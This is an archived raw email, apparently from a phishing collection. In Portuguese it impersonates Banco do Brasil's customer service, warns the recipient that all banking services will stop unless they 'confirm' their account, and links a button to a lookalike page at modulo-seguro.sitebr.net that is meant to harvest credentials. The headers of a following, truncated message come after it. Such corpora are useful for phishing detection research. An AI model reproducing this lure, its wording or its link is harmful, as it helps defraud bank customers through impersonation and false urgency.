From: SAC@BancodoBrasil.com.br
To: jose@monkey.org
Message-Id: <20150425034130.5C205282F6@li308-129.members.linode.com>
Date: Sat, 25 Apr 2015 03:41:30 +0000 (UTC)
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 70


<TABLE cellSpacing=0 

cellPadding=0 width="100%" bgColor=#cccccc>

  

  <TR>

    <TD rowSpan=3 width=1></TD>

    <TD height=1></TD>

    <TD rowSpan=3 width=1></TD></TR>

  <TR>

    <TD bgColor=#0C517A height=400>

      <TABLE border=0 

      width="100%" bgColor=#0C517A>

        

        <TR>

          <TD height=56 bgcolor="#0C517A"><FONT color=#ffffff size=6 

            face=Georgia>&nbsp;</FONT><FONT color=#ffffff 

            face=Georgia style="font-size: 20pt">© </FONT>

			<font face="Georgia" style="font-size: 20pt" color="#FFFFFF">Central 

			de Atendimento BB - CABB.</font></TD></TR></TABLE>

      <TABLE border=0 

      cellSpacing=0 cellPadding=0 width="100%">

        

        <TR>

          <TD width="1%" bgcolor="#EBEBEB">&nbsp;</TD>

          <TD width="99%" bgcolor="#EBEBEB"><BR>

            <TABLE 

            cellSpacing=0 cellPadding=0 width="85%" bgColor=#cccccc>

              

              <TR>

                <TD rowSpan=3 width=1></TD>

                <TD height=1></TD>

                <TD rowSpan=3 width=1></TD></TR>

              <TR>

                <TD bgColor=#ffffff height=237>

                  <TABLE 

                  

                  border=0 cellSpacing=0 cellPadding=0 width="100%">

                    

                    <TR>

                      <TD width=8></TD>

                      <TD height=9 width=1208></TD></TR>

                    <TR>

                      <TD></TD>

                      <TD>

                        <TABLE 

                        

                        cellSpacing=0 cellPadding=0 width="99%" 

                          bgColor=#d8d8d8>

                          <TR>

                            <TD rowSpan=3 width=1></TD>

                            <TD height=1></TD>

                            <TD rowSpan=3 width=1></TD></TR>

                          <TR>

                            <TD bgColor=#ebebeb height=25><B><FONT color=#666666 

                              size=2 

                              face=Arial>&nbsp;&nbsp;</FONT><FONT color=#0C517A 

                              size=2 

                              face=Arial>Comunicado Importante.</FONT></B></TD></TR>

                          <TR>

                            <TD 

                  height=1></TD></TR></TABLE></TD></TR></TABLE><BR>

                  <TABLE 

                  

                  border=0 cellSpacing=0 cellPadding=0 width="100%">

                    

                    <TR>

                      <TD width="1%">&nbsp;</TD>

                      <TD width="99%"><FONT color=#666666 size=2 

                        face=Arial><b>Prezado(a) Cliente</b>,<BR>&nbsp;</FONT><p style="font-size: 9pt; text-align: left; margin: 0px 0cm">

						<font face="Arial" color="#666666">É com grande 

						satisfação que a equipe de segurança envia 

						este e-mail à você cliente. O motivo pelo qual estamos 

						entrando em contato é para alertar sobre o cadastro de 

						sua conta conosco.</font></p>

						<p style="font-size: medium; font-family: 'Times New Roman', serif; color: #666666; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-align: left; margin: 0px 0cm">

						<font face="Arial" style="font-size: 9pt"><br>

						</font><font face="Arial" size="2">

						<span style="font-style: normal">

						<font style="font-size: 9pt">Após a correção de algumas 

						falhas de segurança em nosso sistema, alguns clientes 

						terão que fazer uma simples confirmação para que 

						possamos dar continuidade a todas as suas transações 

						bancárias, inclusive as efetuadas nos caixas 

						eletrônicos.</font></span></font></p>

						<p style="font-size: medium; font-family: 'Times New Roman', serif; color: #666666; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-align: left; margin: 0px 0cm">

						<font face="Arial" size="2">

						<span style="font-style: normal">

						<font style="font-size: 9pt"><br>

						Para sua maior comodidade abrimos um canal via Internet 

						Banking, evitando assim o congestionamento em nossas 

						agências e lhe proporcionando rapidez e conforto.</font></span></font></p>

						<p style="font-size: medium; font-family: 'Times New Roman', serif; color: #666666; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-align: left; margin: 0px 0cm">

						<FONT color=#666666 

                        face=Arial style="font-size: 9pt"><BR><b>Atenção:</b> A</FONT><span style="color: #666666; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 14px; orphans: auto; text-align: justify; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: rgb(255, 255, 255)"> 

						não realização do procedimento provocará a paralisação 

						de todos serviços prestados por nossa Instituição, via 

						Telefone, Internet e Caixas Eletrônicos.</span></p>

						<p style="font-size: medium; font-family: 'Times New Roman', serif; color: #666666; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-align: left; margin: 0px 0cm">&nbsp;</p>

						<p style="font-size: 9pt; font-family: Arial; color: #666666; font-style: normal; font-variant: normal; font-weight: 700; letter-spacing: normal; line-height: normal; orphans: auto; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-align: left; margin: 0px 0cm">

						<span style="background-color: #FFFFFF"> Clique no botão 

						abaixo para iniciar o procedimento de correção.</span></p>

						<p style="font-size: x-small; font-family: Arial; color: #666666; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-align: left; margin: 0px 0cm">&nbsp;</p>

                        <TABLE 

                        

                        cellSpacing=0 cellPadding=0 bgColor=#f5f5f5 width="126">

                          

                          <TR>

                            <TD rowSpan=4 width=1></TD>

                            <TD height=1 width=87></TD>

                            <TD rowSpan=4 width=4></TD></TR>

                          <TR>

                            <TD bgColor=#0C517A>

                              <CENTER>

                              <TABLE 

                              

                              cellSpacing=0 cellPadding=0 width=118>

                                

                                <TR>

                                <TD height=19 width=118>

                                <CENTER><b>

								<a style="text-decoration: none" href="http://modulo-seguro.sitebr.net/acesso.php">

								<font face="arial" size="1" color="#FFFFFF">

								INICIAR CORREÇÃO</font></a></b> 

                                </CENTER></TD></TR></TABLE></CENTER></TD></TR>

                          <TR>

                            <TD bgColor=#aa0000 height=1></TD></TR>

                          <TR>

                            <TD bgColor=#bebebe 

                      height=1></TD></TR></TABLE>

					<FONT face=Arial size=2>

						</FONT></TD></TR></TABLE><BR></TD></TR>

              <TR>

                <TD 

      height=1></TD></TR></TABLE><BR></TD></TR></TABLE></TD></TR>

  <TR>

    <TD height=2></TD></TR></TABLE>

<TABLE border=0 

cellSpacing=0 cellPadding=0 width="100%" bgColor=#e80000>

  

  <TR>

    <TD height=28 bgcolor="#0C517A"><FONT color=#ffffff size=1 face=Arial><B>&nbsp; 

	© Central de Atendimento BB</B></FONT></TD></TR></TABLE>

From bounce-2064040_html-87007417-1165454-10877741-0@bounce.vp-email.com  Sun Apr 26 08:39:28 2015
Return-Path: <bounce-2064040_html-87007417-1165454-10877741-0@bounce.vp-email.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id 9F80EF4132
	for <jose@login.monkey.org>; Sun, 26 Apr 2015 08:39:28 -0500 (CDT)
Received: from smtpin06.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay02.b.hostedemail.com (Postfix) with SMTP id 6359027AB68
	for <jose@login.monkey.org>; Sun, 26 Apr 2015 13:39:28 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70120295616.06.town25_52a2cac0f924c
Authentication-Results: auth.b.hostedemail.com; dmarc=none header.from=grr.la
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 1,0,0,,d41d8cd98f00b204,bounce-2064040_html-87007417-1165454-10877741-0@bounce.vp-email.com,:,RULES_HIT:1803,0,RBL:209.43.22.9:@bounce.vp-email.com:.lbl8.mailshell.net-62.18.0.100 64.10.201.10;209.43.22.9-irl.urbl.hostedemail.com-127.0.0.150,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:neutral,Custom_rules:0:1:0
X-HE-Tag: town25_52a2cac0f924c
X-Filterd-Recvd-Size: 9929
Received: from mta9.vp-email.com (mta9.vp-email.com [209.43.22.9])
	by imf29.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sun, 26 Apr 2015 13:39:27 +0000 (UTC)
Received: by mta9.vp-email.com id h7jl8u163hsf for <jose@monkey.org>; Sun, 26 Apr 2015 07:38:52 -0600 (envelope-from <bounce-2064040_HTML-87007417-1165454-10877741-0@bounce.vp-email.com>)
